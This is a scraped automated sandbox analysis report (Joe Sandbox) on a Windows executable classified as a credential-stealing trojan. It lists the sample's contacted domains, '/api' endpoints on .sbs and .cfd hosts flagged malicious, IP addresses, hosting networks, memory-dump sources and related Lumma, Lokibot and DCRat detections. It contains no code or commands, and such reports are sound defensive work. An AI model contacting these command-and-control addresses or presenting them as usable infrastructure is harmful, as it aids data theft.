    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://mathcucom.sbs/g19%VirustotalBrowse
    enlargkiw.sbs18%VirustotalBrowse
    drawwyobstacw.sbs18%VirustotalBrowse
    https://sergei-esenin.com/0%VirustotalBrowse
    https://vennurviot.sbs/18%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    mathcucom.sbs21%VirustotalBrowse
    ehticsprocw.sbs16%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
    allocatinow.sbs20%VirustotalBrowse
    passimovrt.cfd0%VirustotalBrowse
    https://mathcucom.sbs/apiq#V0%VirustotalBrowse
    https://mathcucom.sbs/21%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    condifendteu.sbs18%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://drawwyobstacw.sbs/api18%VirustotalBrowse
    https://allocatinow.sbs/api20%VirustotalBrowse
    https://vennurviot.sbs/api18%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    condifendteu.sbs
    172.67.141.136
    truetrueunknown
    steamcommunity.com
    104.102.49.254
    truetrueunknown
    vennurviot.sbs
    104.21.46.170
    truetrueunknown
    drawwyobstacw.sbs
    188.114.96.3
    truetrueunknown
    mathcucom.sbs
    188.114.96.3
    truetrueunknown
    sergei-esenin.com
    104.21.53.8
    truetrueunknown
    passimovrt.cfd
    104.21.28.222
    truetrueunknown
    ehticsprocw.sbs
    104.21.30.221
    truetrueunknown
    resinedyw.sbs
    172.67.205.156
    truetrueunknown
    enlargkiw.sbs
    172.67.152.13
    truetrueunknown
    allocatinow.sbs
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    enlargkiw.sbstrueunknown
    allocatinow.sbstrueunknown
    drawwyobstacw.sbstrueunknown
    mathcucom.sbstrueunknown
    https://steamcommunity.com/profiles/76561199724331900true
    • URL Reputation: malware
    unknown
    https://vennurviot.sbs/apitrueunknown
    ehticsprocw.sbstrueunknown
    passimovrt.cfdtrueunknown
    condifendteu.sbstrueunknown
    https://drawwyobstacw.sbs/apitrueunknown
    https://resinedyw.sbs/apitrue
      unknown
      https://passimovrt.cfd/apitrue
        unknown
        https://mathcucom.sbs/apitrue
          unknown
          resinedyw.sbstrue
            unknown
            vennurviot.sbstrue
              unknown
              https://condifendteu.sbs/apitrue
                unknown
                https://enlargkiw.sbs/apitrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.cloudflare.com/learning/access-management/phishing-attack/aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://mathcucom.sbs/gaspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliHhaspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://sergei-esenin.com/aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002918000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://vennurviot.sbs/aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAaspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://resinedyw.sbs/apiq#Vaspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.cloudflare.com/learning/access-man2aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://mathcucom.sbs/apiq#Vaspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.cloudflare.com/5xx-error-landingaspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://mathcucom.sbs/aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://avatars.akamai.steamstaticaspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/about/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.a#haspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://help.steampowered.com/en/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://steamcommunity.com/market/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://store.steampowered.com/news/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamehYaspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://allocatinow.sbs/apiaspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://community.akamai.steamstatic.com/public/shared/css/aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://vennurviot.sbs/&aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://passimovrt.cfd/aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002947000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://mathcucom.sbs/y#Waspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://mathcucom.sbs/apiPyaspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://store.steampowered.com/stats/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://resinedyw.sbs/aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://allocatinow.sbs/piaspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=easpnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://steamcommunity.com/workshop/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://store.steampowered.com/legal/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://mathcucom.sbs/api2aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=easpnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=englaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://upx.sf.netAmcache.hve.5.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://store.steampowered.com/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://allocatinow.sbs/apiraspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://resinedyw.sbs:443/apiaspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://allocatinow.sbs/aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/profile.aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishaspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://store.steampowered.com/account/cookiepreferences/aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.21.53.8
                                                                sergei-esenin.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                188.114.96.3
                                                                drawwyobstacw.sbsEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                172.67.152.13
                                                                enlargkiw.sbsUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                104.21.30.221
                                                                ehticsprocw.sbsUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                172.67.141.136
                                                                condifendteu.sbsUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                104.102.49.254
                                                                steamcommunity.comUnited States
                                                                16625AKAMAI-ASUStrue
                                                                104.21.28.222
                                                                passimovrt.cfdUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                172.67.205.156
                                                                resinedyw.sbsUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                104.21.46.170
                                                                vennurviot.sbsUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1532889
                                                                Start date and time:2024-10-14 05:00:08 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 14s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:11
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:SoftWare(1).exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@5/7@11/9
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 93%
                                                                • Number of executed functions: 24
                                                                • Number of non-executed functions: 102
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                TimeTypeDescription
                                                                23:01:02API Interceptor4x Sleep call for process: aspnet_regiis.exe modified
                                                                23:01:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                                                                  SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    188.114.96.3DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/sirr/five/fre.php
                                                                                    lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
